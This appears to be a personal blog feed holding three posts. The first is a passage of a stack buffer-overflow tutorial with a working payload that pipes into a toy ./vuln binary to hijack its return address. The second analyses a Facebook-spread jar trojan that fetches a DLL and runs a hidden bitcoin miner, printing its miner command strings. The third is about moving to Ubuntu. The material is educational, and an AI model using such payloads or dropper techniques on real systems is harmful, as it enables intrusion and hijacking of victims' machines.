<p>The address of <code class="highlighter-rouge">secretFunction</code> is <code class="highlighter-rouge">0804849d</code> in hex.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0804849d <secretFunction>:
</code></pre></div> </div>
</li>
<li>
<p><code class="highlighter-rouge">38 in hex or 56 in decimal</code> bytes are reserved for the local variables of <code class="highlighter-rouge">echo</code> function.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 80484c0: 83 ec 38 sub $0x38,%esp
</code></pre></div> </div>
</li>
<li>
<p>The address of <code class="highlighter-rouge">buffer</code> starts <code class="highlighter-rouge">1c in hex or 28 in decimal</code> bytes before <code class="highlighter-rouge">%ebp</code>. This means that 28 bytes are reserved for <code class="highlighter-rouge">buffer</code> even though we asked for 20 bytes.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 80484cf: 8d 45 e4 lea -0x1c(%ebp),%eax
</code></pre></div> </div>
</li>
</ol>
<blockquote>
<h3 id="designing-payload">Designing payload:</h3>
</blockquote>
<p>Now we know that 28 bytes are reserved for <code class="highlighter-rouge">buffer</code>, it is right next to <code class="highlighter-rouge">%ebp</code>(the Base pointer of the <code class="highlighter-rouge">main</code> function). Hence the next 4 bytes will store that <code class="highlighter-rouge">%ebp</code> and the next 4 bytes will store the return address(the address that <code class="highlighter-rouge">%eip</code> is going to jump to after it completes the function). Now it is pretty obvious how our payload would look like. The first 28+4=32 bytes would be any random characters and the next 4 bytes will be the address of the <code class="highlighter-rouge">secretFunction</code>.</p>
<p><em>Note: Registers are 4 bytes or 32 bits as the binary is compiled for a 32 bit system.</em></p>
<p>The address of the <code class="highlighter-rouge">secretFunction</code> is <code class="highlighter-rouge">0804849d</code> in hex. Now depending on whether our machine is little-endian or big-endian we need to decide the proper format of the address to be put. For a little-endian machine we need to put the bytes in the reverse order. i.e. <code class="highlighter-rouge">9d 84 04 08</code>. The following scripts generate such payloads on the terminal. Use whichever language you prefer to:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby <span class="nt">-e</span> <span class="s1">'print "a"*32 + "\x9d\x84\x04\x08"'</span>
python <span class="nt">-c</span> <span class="s1">'print "a"*32 + "\x9d\x84\x04\x08"'</span>
perl <span class="nt">-e</span> <span class="s1">'print "a"x32 . "\x9d\x84\x04\x08"'</span>
php <span class="nt">-r</span> <span class="s1">'echo str_repeat("a",32) . "\x9d\x84\x04\x08";'</span>
</code></pre></div></div>
<p><em>Note: we print \x9d because 9d was in hex</em></p>
<p>You can pipe this payload directly into the <code class="highlighter-rouge">vuln</code> binary.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby <span class="nt">-e</span> <span class="s1">'print "a"*32 + "\x9d\x84\x04\x08"'</span> | ./vuln
python <span class="nt">-c</span> <span class="s1">'print "a"*32 + "\x9d\x84\x04\x08"'</span> | ./vuln
perl <span class="nt">-e</span> <span class="s1">'print "a"x32 . "\x9d\x84\x04\x08"'</span> | ./vuln
php <span class="nt">-r</span> <span class="s1">'echo str_repeat("a",32) . "\x9d\x84\x04\x08";'</span> | ./vuln
</code></pre></div></div>
<p>This is the output that I get:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Enter some text:
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<rubbish 3 bytes>
Congratulations!
You have entered in the secret function!
Illegal instruction (core dumped)
</code></pre></div></div>
<p>Cool! we were able to overflow the buffer and modify the return address. The <code class="highlighter-rouge">secretFunction</code> got called. But this did foul up the stack as the program expected <code class="highlighter-rouge">secretFunction</code> to be present.</p>
<blockquote>
<h3 id="what-all-c-functions-are-vulnerable-to-buffer-overflow-exploit">What all C functions are vulnerable to Buffer Overflow Exploit?</h3>
</blockquote>
<ol>
<li>gets</li>
<li>scanf</li>
<li>sprintf</li>
<li>strcpy</li>
</ol>
<p>Whenever you are using buffers, be careful about their maximum length. Handle them appropriately.</p>
<blockquote>
<h3 id="what-next">What next?</h3>
</blockquote>
<p>While managing <a href="https://backdoor.sdslabs.co/">BackdoorCTF</a> I devised a simple challenge based on this vulnerability. <a href="https://backdoor.sdslabs.co/challenges/ECHO">Here</a>. See if you can solve it!</p>
Facebook spam spreads Trojan2014-06-12T00:00:00+00:00https://dhavalkapil.com/blogs/Facebook-spam-spreads-Trojan<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>Somewhere back in May, I started getting messages such as this on facebook:</p>
<p><img src="/assets/images/Facebook-spam-spreads-Trojan/fb_message_snipet.png" alt="A screenshot of the message" /></p>
<p>I had around 300 friends then and got almost 8-9 such messages. The interesting thing was that those people were completely unrelated. According to me some of them didn’t know each other. Suspecting some trick I decided to analyze the file.</p>
<blockquote>
<h2 id="analysis">Analysis</h2>
</blockquote>
<h3 id="handling-the-zip-file">Handling the zip file</h3>
<p>I downloaded the <code class="highlighter-rouge">zip</code> file and verified it’s type using linux <code class="highlighter-rouge">file</code> command. Then after unzipping the file I found a <code class="highlighter-rouge">jar</code> file inside it. <em>Just for reference a jar file is a java archive file which can be run by simply double clicking it</em>. It is equivalent to <code class="highlighter-rouge">exe</code> file in C/C++. Another important point to note is that a <code class="highlighter-rouge">jar</code> file is infact a <code class="highlighter-rouge">zip</code> file(only the extension has been changed). So the next step I did was to extract the <code class="highlighter-rouge">jar</code> file. Doing that produced a single class file alongwith the usual META-INF</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vampire@linux:~/Documents/analysis$ file Form\_0320.ZIP
Form\_0320.ZIP: Zip archive data, at least v2.0 to extract
vampire@linux:~/Documents/analysis$ unzip Form\_0320.ZIP
Archive: Form\_0320.ZIP
inflating: Form\_0320.jar
vampire@linux:~/Documents/analysis$ file Form\_0320.jar
Form\_0320.jar: Zip archive data, at least v2.0 to extract
vampire@linux:~/Documents/analysis$ unzip Form\_0320.jar
Archive: Form\_0320.jar
creating: META-INF/
inflating: META-INF/MANIFEST.MF
inflating: CNQNYPYFEBMJTHYPMGR.class
vampire@linux:~/Documents/analysis$ ls
Form\_0320.jar Form\_0320.ZIP CNQNYPYFEBMJTHYPMGR.class META-INF
</code></pre></div></div>
<p><em>Note: I am analysing Form_0320.ZIP.</em></p>
<h3 id="decompiling-and-analysing-the-java-class-file">Decompiling and analysing the java class file</h3>
<p>Next I decompiled the class file using the <code class="highlighter-rouge">jad</code> tool.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vampire@linux:~/Documents/analysis$ jad CNQNYPYFEBMJTHYPMGR.class
Parsing CNQNYPYFEBMJTHYPMGR.class...The class file version is 51.0 (only 45.3, 46.0 and 47.0 are supported)
Generating CNQNYPYFEBMJTHYPMGR.jad
</code></pre></div></div>
<p>It created <code class="highlighter-rouge">CNQNYPYFEBMJTHYPMGR.jad</code> which contains the source code for the java program. The resulting code was pretty much obscure. All Strings were stored as int arrays of ascii codes. The arrays were dynamically converted to <code class="highlighter-rouge">String</code> within the code. I present here an easy to understand version of the <a href="/assets/files/Facebook-spam-spreads-Trojan/CNQNYPYFEBMJTHYPMGR.jad">code</a>.</p>
<p>Instead of going through the code liny by line I will explain the whole code at once. The program tries to download a certain file from a dropbox link. The same file has multiple links so that if one fails the others might work. If it get’s a successfull HTTP response code it downloads the file to <code class="highlighter-rouge">C:\temp\NWQGHJ.MXZ</code>. The program then register’s it to windows using the <code class="highlighter-rouge">regsvr32</code> command line operation running in silent mode (/s). So what I did was that I downloaded the file(d.dat) manually from the dropbox link and ran a <code class="highlighter-rouge">file</code>command with it.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vampire@linux:~/Documents/analysis$ file d.dat
d.dat: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
</code></pre></div></div>
<p>This shows that the file is a <code class="highlighter-rouge">Windows DLL</code> file.</p>
<h3 id="analysing-the-dll-file">Analysing the DLL file</h3>
<p>I tried a few ways at first which seem to be leading to nothing, including <code class="highlighter-rouge">strings</code> and <code class="highlighter-rouge">objdump</code>. Later I renamed it to <code class="highlighter-rouge">d.dll</code>(did that to make sure my antivirus on windows finds it) and switched over to windows. Here’s a snapshot of what my antivirus found:</p>
<p><img src="/assets/images/Facebook-spam-spreads-Trojan/antivirus.png" alt="screenshot of my screen showing the result of the antivirus" /></p>
<p>Hence it somehow connects the <code class="highlighter-rouge">dll</code> with the windows process <code class="highlighter-rouge">explorer.exe</code>. This process is the one used to browse the files in a computer. Next I used <code class="highlighter-rouge">strings</code> command and stored the result in a file.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vampire@linux:~/Documents/analysis$ strings d.dat > file
</code></pre></div></div>
<p>Then I opened the file in a text editor and searched for .exe. This resulted in two matches:</p>
<blockquote>
<p>minerd.exe<br />
explorer.exe</p>
</blockquote>
<p><em>Seems to be getting somewhere.</em> Browsing through the 59252 lines I found the following two snippets:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t 1 -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t 1 -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
</code></pre></div></div>
<p>and this one:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Usage: minerd [OPTIONS]
Options:
-a, --algo=ALGO specify the algorithm to use
scrypt scrypt(1024, 1, 1) (default)
sha256d SHA-256d
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-u, --user=USERNAME username for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
-t, --threads=N number of miner threads (default: number of processors)
-r, --retries=N number of times to retry if a network call fails
(default: retry indefinitely)
-R, --retry-pause=N time to pause between retries, in seconds (default: 30)
-T, --timeout=N network timeout, in seconds (default: 270)
-s, --scantime=N upper bound on time spent scanning current work when
long polling is unavailable, in seconds (default: 5)
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
-q, --quiet disable per-thread hashmeter output
-D, --debug enable debug output
-P, --protocol-dump verbose dump of protocol-level activities
--benchmark run in offline benchmark mode
-c, --config=FILE load a JSON-format configuration file
-V, --version display version information and exit
-h, --help display this help text and exit
</code></pre></div></div>
<p>I searched about minerd.exe on the internet and found out <a href="http://deletemalware.blogspot.in/2013/06/what-is-minerdexe-and-how-to-remove-it.html">this</a>:</p>
<blockquote>
<p>minerd.exe is a part of multi-threaded CPU miner for Bitcoin crypto-currency system. Very often this application causes CPU usage to go to 90% or even more. Needles to say it’s not essential for Windows and may cause problems. If you knowingly installed this Bitcoin miner on your computer then there’s nothing to worry about. Even if you antivirus says it’s a trojan horse it’s probably a false positive. However, cyber crooks and fraudsters are using this software to earn some extra money as well by monetizing botnets. They drop the main mining modules on infected computers and start mining. They usually set low mining speed, so that the minerd.exe process only uses unused CPU cycles.</p>
</blockquote>
<p>So basically this file uses the CPU to mine for bitcoins. It is a core part of the bit coin virus. But it doesn’t stop here. The file further sends the same message to other people on facebook. In case they open it, the same thing happens again. In this way a botnet(collection of programs communicating over a network with other similar programs to perform tasks) is set by the attacker to mine the bitcoins!</p>
<blockquote>
<h2 id="summary">Summary</h2>
</blockquote>
<p>In short this trojan does the following things:</p>
<ol>
<li>The victim receives a message on facebook. The message contains a zip file and a text message(lol) so that the victim is eager to open it.</li>
<li>Inside the zip file is a jar file which the user opens again without suspecting anything.</li>
<li>The jar file downloads a dll file from a dropbox link to the local hard disk and registers it to windows.</li>
<li>This file then sends the same message to all the friends of the victim on facebook and simultaneously starts mining for bitcoins.</li>
<li>Within a short span of time a botnet of victims is set up.</li>
</ol>
<blockquote>
<h2 id="preventive-measures">Preventive Measures</h2>
</blockquote>
<ol>
<li>Never open a file of which you are not sure.</li>
<li>Confirm with your friend whether he has sent it or not.(preferably using a different communication channel)</li>
<li>Always have an updated antivirus program running on your windows machine.</li>
</ol>
Shifting to Ubuntu2014-05-23T00:00:00+00:00https://dhavalkapil.com/blogs/Shifting-to-Ubuntu<blockquote>
<h2 id="initial-days">Initial days…</h2>
</blockquote>
<p>I had started coding on Windows. I began to get familiar with the graphical interfaces of NetBeans, Visual Studio, Eclipse etc. As I got to know more about programming and developing I began to hear about a certain thing called ‘linux’. This word kept popping out in many articles of stackoverflow or other resources that I used to depend upon. At first the name gave me the image of a computer with a pitch black screen with just plain text appearing on it. I then came to know about the power of the linux terminal. As I already had a little experience with bash scripting in Windows command prompt, I began to realize the usefullness of such an operating system. But due to my busy schedule I couldn’t delve further in this topic at that time.</p>
<p>A few years later one of my friends told me that she had installed Ubuntu on her desktop PC. I knew it was one of the Linux distribution. Then she started comparing it with Windows. This increased my interest in Ubuntu and I began to think of switching to it from Windows. I also heard from some other resource that the graphical interface of Ubuntu is sufficient for people to start working on it without any prior experiences. This set my mind and I finally installed Ubuntu in parallel with Windows.</p>
<blockquote>
<h2 id="switching-over">Switching over…</h2>
</blockquote>
<p>During the initial days I started to use the graphical interface of Ubuntu for my work. Side by side using various references I got to know more and more about the terminal. Although it took me around a full week to download all my softwares required for various programming languages and to get them working right, I learned a lot about Ubuntu. From then on I used to code in Ubuntu while did other work in Windows. Within a few weeks I had started using the terminal excessively. I had stopped using IDEs and used the text editor ‘gedit’ and terminal instead for compiling and running programs. Within another few months I stopped using Windows entirely except for very few softwares for whom I couldn’t find replacements in Ubuntu.</p>
<blockquote>
<h2 id="some-features-of-linux-over-windows">Some features of Linux over Windows:</h2>
</blockquote>
<ol>
<li>Customizability: The customizability of Linux is virtually <em>limitless</em>. If you don’t like something you simply change it.</li>
<li>Stability: linux operating systems are much much more stable than Windows. You could leave a Linux desktop on for several months without any performance degradation. In case you leave Windows on for even a few days it starts crashing.</li>
<li>Perfomance: Resource management of Linux is pretty good. It knows how to allocate proper memory and utilize the processor more efficiently than Windows.</li>
<li>Developing: If you are a developer then no doubt you SHOULD use linux. There are a whole bunch of tools that you would be missing out on in Windows. Apart from that developing any application is much more easier in Linux than in Windows. I’d like to give you an instance of it - When I had started learning PHP in my Windows days, I had a lot of trouble in setting up PHP server on my pc. I was so fed up that I completely removed it. Infact I used to host my PHP pages on a free PHP hosting website. Imagine the time it took me to make any change. I first made changes in my files locally then used ftp to transfer them to the server(which was running apache on linux). Instead when I had to use PHP on Ubuntu it hardly took me 3-5 minutes to get LAMP(Linux-Apache-MySql-PHP) installed. All I had to do to view my changes was to press the refresh button!</li>
<li>Price: Linux is completely free!</li>
<li>Terminal: The linux terminal is extremely more powerful than the Windows command prompt. I could do tons of things using extremely short commands.</li>
</ol>
<p><img src="/assets/images/Shifting-to-Ubuntu/screenshot.png" alt="A screenshot of my laptop" /></p>
<blockquote>
<h2 id="present-situation">Present situation…</h2>
</blockquote>
<p>Currently I do practically all my work using the terminal. Whenever I open my laptop my first keys are <code class="highlighter-rouge">Ctrl-Alt-t</code> which opens the terminal and last keys are <code class="highlighter-rouge">sudo shutdown -h now</code> which shut downs the laptop. I’ve started loving it. Now I even download files, download videos from youtube, send mails and use facebook(yeah even this!) using the terminal. It has made things much easier and systematic. Imagine liking and commenting on 100+ posts on your birthday and compare it with hardly a few commands at the terminal doing the same thing. It saves a lot of time. Apart from that I use ‘Sublime Text 2’ for writing code, ‘vim’ when I need to change a few lines and ‘chromium web browser’ for browsing the web.</p>